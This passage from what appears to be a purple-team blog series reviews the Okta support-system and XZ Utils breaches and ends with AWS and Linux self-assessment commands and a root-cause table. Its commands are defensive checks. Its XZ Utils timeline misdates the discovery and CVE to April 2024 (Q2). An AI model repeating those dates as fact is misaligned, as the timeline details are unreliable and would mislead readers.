  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive \
  --user-name affected-user

The structural lesson: Secrets stored in a CI/CD platform are only as secure as that platform’s internal access controls and the endpoint security of the engineers who access it. The alternative — short-lived credentials via OIDC workload identity — means no long-lived secrets exist to exfiltrate.


October 2023: Okta — Support System Compromise

OWASP: A07 (Identification and Authentication Failures)

Okta is the identity provider for thousands of organizations. An attacker who compromises Okta’s support system gains access to customer identity configurations.

In October 2023, Okta disclosed that an attacker had accessed their customer support case management system using stolen credentials. The attacker used that access to view HTTP Archive (HAR) files that customers had uploaded as part of support tickets. HAR files capture all network traffic in a browser session — including session cookies and authentication tokens.

What the attacker retrieved from HAR files:
– Active session tokens for customer Okta admin accounts
– Enough data to authenticate as Okta admins for affected customers

Confirmed affected customers (that disclosed publicly):
– 1Password (detected and contained quickly)
– Cloudflare
– BeyondTrust

The dwell time: Okta’s later forensic analysis revealed the attacker had access for two weeks before the disclosure.

# Check Okta System Log for suspicious admin activity
# Look for admin authentications from unusual IPs or at unusual times
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.session.start\"+and+actor.type+eq+\"User\"&since=$(date -d '30 days ago' --iso-8601=seconds)" | \
  jq '.[] | {user: .actor.displayName, ip: .client.ipAddress, time: .published, result: .outcome.result}'

The structural implication for organizations using Okta: Tier-0 accounts (Okta administrators) need break-glass procedures and hardware key MFA — not because Okta itself will be compromised, but because a support system compromise at a SaaS provider can expose session context that reaches those accounts.


April 2024: XZ Utils — Two Years of Social Engineering

OWASP: A08 (Software and Data Integrity Failures), A06 (Vulnerable and Outdated Components)

XZ Utils (CVE-2024-3094) is the most sophisticated supply chain attack to date in the open-source ecosystem. The attacker operated under the pseudonym “Jia Tan” and spent approximately two years building trust in the XZ Utils project before inserting a backdoor.

The timeline:

2022 Q4 — Jia Tan begins contributing to XZ Utils with legitimate, high-quality patches
2023 Q1 — Jia Tan increases contribution frequency; original maintainer shows signs of burnout
2023 Q2 — Jia Tan gains commit access to XZ Utils
2024 Q1 — Jia Tan releases XZ Utils 5.6.0 and 5.6.1 with backdoor in release tarball
          (NOT in git repository — only in the distributed tarball)
2024 Q2 — Andres Freund (Microsoft engineer, incidentally) notices SSH is 500ms slower
          on systems with xz 5.6.x; investigates; finds backdoor
          Reported April 1, 2024; CVE assigned April 2, 2024

The backdoor’s target: The backdoor patched sshd via systemd on glibc-based Linux systems. On affected systems, it would have given the attacker remote code execution on SSH servers — specifically, authentication bypass for a specific RSA key pair held by the attacker.

What was 1–2 weeks from shipping broadly:
– Fedora 40 (test release only — caught before stable)
– Debian unstable/testing
– openSUSE Tumbleweed

The detection insight: The backdoor was in the release tarball, not the git repository. git clone and git diff would not have shown it. The only detection was comparing the distributed tarball’s build output against a reproducible build from source — or noticing the anomalous SSH latency.

# Check if your systems have the affected xz version
xz --version
# Vulnerable: 5.6.0 or 5.6.1

# Check on RPM-based systems
rpm -q xz

# Check on Debian/Ubuntu systems
dpkg -l xz-utils

# Check for sshd linked against compromised libzma
ldd $(which sshd) | grep liblzma
# If libzma is present and xz is 5.6.0 or 5.6.1, the system was exposed

The Three Root Causes: A Framework for Your Exercise Backlog

After analyzing these six incidents (and the broader 2020–2025 breach landscape), three root causes account for virtually every major cloud infrastructure compromise:

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ROOT CAUSE 1: IDENTITY                                         │
│  Attacker obtains valid credentials — stolen, phished,          │
│  or socially engineered. MFA does not stop it if MFA            │
│  itself can be bypassed (fatigue, SIM swap, token theft).       │
│  Incidents: Uber, Okta, CircleCI (initial vector)               │
│                                                                 │
│  ROOT CAUSE 2: SUPPLY CHAIN                                     │
│  Attacker compromises something you trust: a vendor's           │
│  software, a build pipeline, an open-source dependency.         │
│  The artifact you install is legitimate — and malicious.        │
│  Incidents: SolarWinds, XZ Utils, Log4Shell (component)         │
│                                                                 │
│  ROOT CAUSE 3: MISCONFIGURATION                                  │
│  An access control is wrong. A resource is exposed that         │
│  shouldn't be. An encryption requirement is missing.            │
│  No attacker capability required — just knowledge of the gap.   │
│  Incidents: Capital One (S3 + IAM), public buckets broadly      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Your purple team exercise backlog should cover all three. The remaining episodes in this series address each one:

  • Identity: EP05 (MFA fatigue), EP10 (cross-account lateral movement)
  • Supply chain: EP06 (CI/CD secrets), EP09 (SolarWinds to XZ Utils)
  • Misconfiguration: EP04 (broken access control in AWS), EP07 (SSRF/IMDS), EP08 (container escape)

Run This in Your Own Environment: Breach Scenario Self-Assessment

Before starting the technique-specific episodes, run this self-assessment to identify which breach scenario your environment is most exposed to:

#!/bin/bash
# Purple Team EP03 — Breach Exposure Self-Assessment

echo "=== IDENTITY EXPOSURE ==="
echo "--- Users with console access and no MFA ---"
aws iam generate-credential-report > /dev/null 2>&1 && sleep 3
aws iam get-credential-report --query 'Content' --output text | \
  base64 -d | awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "  NO MFA: " $1}'

echo ""
echo "=== SUPPLY CHAIN EXPOSURE ==="
echo "--- Lambda functions with old runtimes (EOL = higher CVE exposure) ---"
aws lambda list-functions \
  --query 'Functions[?Runtime==`python3.8` || Runtime==`nodejs14.x` || Runtime==`java8`].{Name:FunctionName,Runtime:Runtime}' \
  --output table

echo ""
echo "=== MISCONFIGURATION EXPOSURE ==="
echo "--- S3 buckets without account-level public access block ---"
ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
PAB=$(aws s3control get-public-access-block --account-id "$ACCOUNT" 2>/dev/null)
if [ -z "$PAB" ]; then
  echo "  CRITICAL: Account-level S3 public access block is NOT set"
else
  echo "$PAB" | jq '{BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets}'
fi

echo ""
echo "--- EC2 instances with IMDSv1 enabled (SSRF risk) ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,State:State.Name}' \
  --output table

⚠ Common Mistakes When Using Breach History as a Training Resource

Assuming “we’re not SolarWinds” means supply chain doesn’t apply. You don’t have to be a software vendor. Your GitHub Actions workflows pull third-party actions. Your Dockerfiles pull base images. Your Lambda functions install pip packages. Every external artifact is a supply chain dependency.

Treating Log4Shell as “old news.” The vulnerability was disclosed in 2021. Organizations are still finding Log4j in unexpected places in 2024 — embedded in monitoring agents, database drivers, and vendor-supplied applications where the dependency tree was never audited.

Responding to Uber/Okta by mandating security awareness training. The Uber breach happened to an experienced contractor who made one decision under social pressure. The structural fix is hardware MFA that cannot be fatigue-attacked — not a training module that adds friction and gets clicked through.

Not correlating your own logs against breach indicators. Every breach in this episode produced specific, searchable indicators: specific CloudTrail event patterns, specific process behaviors, specific network anomalies. If you have historical logs, you can run indicators of compromise against them to see whether your environment would have surfaced those indicators.


Quick Reference

Breach Year OWASP Primary Root Cause Structural Fix
SolarWinds 2020 A08 Supply chain — build pipeline compromise Reproducible builds, build system isolation
Log4Shell 2021 A03, A06 Injection + vulnerable component Patch + dependency inventory
Uber 2022 A07, A02 Identity — MFA fatigue + hardcoded creds Hardware MFA + no hardcoded secrets
CircleCI 2023 A07, A08 Identity — session token theft → CI secret theft OIDC short-lived creds instead of stored secrets
Okta 2023 A07 Identity — support system compromise → token theft Hardware MFA for tier-0, session token rotation
XZ Utils 2024 A08, A06 Supply chain — social engineering → maintainer trust Reproducible builds, artifact signing, SLSA

Key Takeaways

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident is one or more of these
  • SolarWinds and XZ Utils are the same attack class: compromise the build pipeline and sign the result with a trusted key
  • Uber demonstrates that MFA does not prevent breach when the MFA mechanism is push-notification — fatigue + social engineering defeats it
  • CircleCI demonstrates that long-lived secrets stored in a CI/CD platform are only as secure as that platform — OIDC short-lived credentials eliminate the exposure
  • Log4Shell demonstrates that vulnerable transitive dependencies are invisible without active dependency scanning — “we didn’t use Log4j” was wrong for thousands of organizations
  • The attack surface does not change: the same three root causes that caused SolarWinds in 2020 caused XZ Utils in 2024
  • Your purple team exercise backlog should include at least one scenario for each of the three root causes

What’s Next

EP04 starts the technique-specific episodes with broken access control in AWS — the most common OWASP A01 manifestation in cloud infrastructure. The exercise scenario: an S3 bucket with 47 million records, public for six months, with no alert ever firing. We simulate it, detect it, and fix the IAM and S3 configuration so it cannot happen in your account. If you want the full context for AWS IAM privilege escalation paths that broken access control enables, the IAM series EP08 covers that attack chain in detail.

Get EP04 in your inbox when it publishes → subscribe at linuxcent.com